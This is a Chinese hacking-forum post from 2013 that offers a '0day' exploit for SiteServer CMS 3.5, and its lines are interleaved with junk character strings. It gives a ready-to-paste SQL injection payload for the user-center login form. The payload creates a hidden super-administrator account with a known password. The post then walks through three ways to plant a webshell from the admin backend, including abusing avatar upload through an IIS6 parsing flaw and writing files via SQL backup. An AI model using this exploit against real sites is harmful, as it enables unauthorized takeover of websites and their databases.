找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2187|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
# T  X3 T$ x; E: t  k- ?) c" }6 e+ ]+ n9 O7 d
stieserver官网:www.siteserver.cn2 f# B* M& x& O8 T% T3 J

0 \* H% U& c! D" y) d
) z; g1 e' }( _: }" n8 l. E% T# I. B: {1 v
EXP:
3 I' D. z. E( b  f; z9 W! L( d# ^
9 I: u" q/ K4 }7 R& _直接访问UserCenter/login.aspx4 Y7 p1 z5 G. k* p' u: J# ~! i
! i$ D1 c/ R! ?7 \* _5 l& d7 c/ ]

8 t- D$ V$ o2 p* u4 \1 d* h  Y% ]6 q+ ]7 [2 z$ _& \
用户名处输入:/ A0 X7 b' ^& ^8 i4 a! O; m

  B& C2 N6 o9 a- g" m' ^. d$ {123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
- q  a$ N% W( e7 h% g
5 L1 @6 u: n+ x' W7 K) x4 r / }3 F0 l' @3 H' \/ X! O
' Y0 G& l6 _4 ]4 N0 W7 w! u, d
密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。: e7 I/ H& W$ m- N1 m$ s

1 F) y) L1 \/ K" \7 W+ ?
' y* N1 ~4 V. M- h6 K
0 S. J! V8 e! }6 e$ R6 S! c之后再访问后台SiteServer/login.aspx用插入的用户登陆' X" k$ K# `5 J. {* N# K- z
! v* k' f0 }4 p& l) B
& D; n$ ~8 [8 ?3 R7 q" n1 X8 f

4 Y: y) w7 v8 G' L后台拿webshell的三种方法:4 k0 O0 B" D" |+ v

! t- j# p  x, ^( s一、
; l  p. A( d8 I9 b8 P  Q$ H2 |7 C2 g: ?/ h" t
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx+ e: i: E1 |. a6 N% Z0 M

8 L2 Y) E# q( j0 h( K# Q2 F/ h, j二、+ z; z' }# z3 p1 K3 `9 U+ A4 U1 m, X

$ ~/ p6 V( t/ Z) _' _; x3 o成员权限-》添加用户-》用户名为:1.asp
- j* X- j4 r  i/ m2 B
& g* u( _$ u7 z1 khttp://127.0.0.1/usercenter// O7 n$ Y6 U( A3 j% z
! ^# O& h' q: \7 M  [0 a
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell+ A1 Z4 A+ F. Z, }3 s: V+ c
2 \# l( o  B5 w6 n
(ps:后台添加用户时不会验证是否含有非法字符); B3 K3 e- S0 R" z4 ?0 i7 m6 S4 j

0 d9 L( V7 u" D! C: {8 u# ^' B三、0 r- [. T) L2 ~7 T8 V

) |: g8 x4 _& v; F系统工具-》实用工具-》机器参数查看' I8 D# k) M; d& U$ W4 T
可以看到数据库类型、名称,WEB路径
; }1 N5 ^# [* }/ W/ A0 T3 @' G& |& ~+ P! `/ W
系统工具-》数据库工具-》SQL语句查询/ F. }* J. U! c2 l
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。
- u+ a: O( ?" S, P2 o2 m( M; A+ m' c
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表